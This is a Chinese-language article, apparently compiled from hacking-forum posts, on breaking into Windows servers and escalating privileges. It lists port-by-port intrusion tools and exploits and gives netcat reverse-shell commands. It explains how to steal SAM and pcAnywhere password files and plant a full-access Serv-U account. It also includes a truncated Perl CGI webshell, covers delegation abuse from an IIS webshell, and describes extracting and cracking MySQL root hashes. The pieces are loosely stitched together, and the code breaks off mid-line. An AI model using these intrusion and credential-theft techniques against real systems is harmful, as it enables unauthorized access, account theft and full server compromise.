如何找漏洞，又怎样利用它提权

1 1433端口入侵 scanportexe 查有1433的机器 SQLScanPassexe 进行字典暴破（字典是关键） 最后 SQLToolsexe入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloFexe 入侵ip 1433 本机ip 本机端口 （以上反向的，测试成功） sqlhellozexe 入侵ip 1433 （这个是正向连接） 2 4899端口入侵 用4899过滤器exe，扫描空口令的机器 3 3899的入侵 对很早的机器，可以试试3389的溢出(win3389exexe) 对2000的机器，可以试试字典暴破。(tscrackexe) 4 80入侵 对sp3以前的机器，可以用webdav入侵； 对bbs论坛，可以试试上传漏洞（upfileexe或dvup_delphiexe） 可以利用SQL进行注入。（啊D的注入软件）。 5 serv-u入侵(21端口） 对5 004及以下系统，可用溢出入侵。（serv5004exe） 对5100及以下系统，可用本地提升权限。（servlocalexe） 对serv-u的MD5加密密码，可以用字典暴破。（crackvbs） 输入一个被serv-u加密的密码（34位长），通过与字典档（dicttxt）的比较，得到密码 6 554端口 用real554exe入侵。 7 6129端口 用DameWare6129exe入侵。 8 系统漏洞 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 进行溢出入侵。 9 3127等端口 可以利用doom病毒开的端口，用nodoomexe入侵。（可用mydoomscanexe查）。 10 其他入侵 利用shanlu的入侵软件入侵（WINNTAutoAttackexe）。 经典IPC$入侵 本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候，下一部要做的就是提升权限 个人总结如下： 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆 2C:\WINNT\system32\config\ 进这里下它的SAM，破解用户的密码 用到破解sam密码的软件有LC，SAMinside 3C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能跳转不，我们从这里可以获取好多有用的信息 可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转 进去后，如果有权限修改ServUDaemonini，加个用户上去，密码为空 [USER=WekweN|1] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues= 这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限 4c:\winnt\system32\inetsrv\data\ 就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行 5看能否跳转到如下目录 c:\php, 用phpspy c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f

假设这样一种场景，在域中获取了一台IIS机器的webshell，默认权限iis defaultapppool，在试了其他办法后仍然无法提权至system权限时，可以试试基于资源的约束委派来获取IIS所在机器的system权限。要成功利用这种技术需要两个前提，一个是需要域中的一个服务账号或普通域账号的密码或者哈希值，另一个就是IIS所在机器加入了域。

如果没有服务账号，可以通过普通域账号创建一个新的机器账号，以此来设置这个机器账号到IIS所在机器的资源约束委派。设置资源约束委派的关键源码如下：

源码中，sid表示新创建的机器账号的objectSid属性值，iisName表示IIS所在机器的名称。

通过webshell上传可以设置资源委派的程序到IIS服务器中，直接运行程序就会成功设置资源约束委派：

如上图所示，虽然运行程序的权限很低，但是程序在域中请求网络资源时是用所在机器的机器账号这一身份来请求的，在这里就相当于IIS所在机器会请求修改自身msDS-AllowedToActOnBehalfOfOtherIdentity属性值，而默认情况下自身是有权限修改自己的这个属性值的。

委派设置成功后，通过getSTpy模拟administrator来申请一张高权限票据，然后通过mimikatz注入票据：

利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限) 并且获得了root的账号密码

先来说说我是咋判断一台windows服务器上的mysql有没有降权的 00如果能运行cmd的话,我会先看看有啥用户先,如果有mysql mssql这样用户名,或者类似的我就会猜测他的mssql服务或者mysql的已经被降权运行了但并不代表不能提权,只要能运行cmd

接着说一下,判断服务器上是否开启了mysql服务 一般在拿到webshell的时候,都会扫描一下端口,如果开启了3306端口的话,我会telnet 过去看看- -忘了有无回显~(提权的时候,大多数 3306端口的都是不支持外链的呃,我遇到的大多数是这样, 有root可以开启外链) 当然也有一些管理员会把mysql的默认端口改掉另外一个判断的方法就是网站是否支持php,一般支持php的网站都用mysql数据库的php+mysql啊,好基友啊好丽友- -~（当然,也有一些网站用其他的一些更专业的数据库）

再说说如何查找mysql root的密码

MYSQL所有设置默认都保存在“C:\Program Files\MYSQL\MYSQL Server 50\data\MYSQL”中，也就是安装程序的data目录下，如图2所示，有关用户一共有三个文件即userfrm、userMYD和 userMYI，MYSQL数据库用户密码都保存在userMYD文件中，包括root用户和其他用户的密码。

Userfrm usermyd Usermyi

这几个文件在webshell下,下载下来,解密用c32asm或者其他的一些文本编辑器userMYD打开

A30F80616A023BDFC9

复制到cmd5com那查一下,或者用cain爆破一下

打开后使用二进制模式进行查看，如图所示，可以看到在root用户后面是一串字符串，选中这些字符串将其复制到记事本中，这些字符串即为用户加密值，即A30F80616A023BDFC9 。

具体使用cain破解的,我这就不演示了

还有一个查找的方法就是,一些php网站安装的时候用的是root用户,例如dedecms,他数据库安装的信息就是写在data/commonincphp

以上就是关于如何找漏洞，又怎样利用它提权全部的内容，包括:如何找漏洞，又怎样利用它提权、IIS提权-基于域中资源的约束委派利用、如何通过mysql提权获得flag值等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！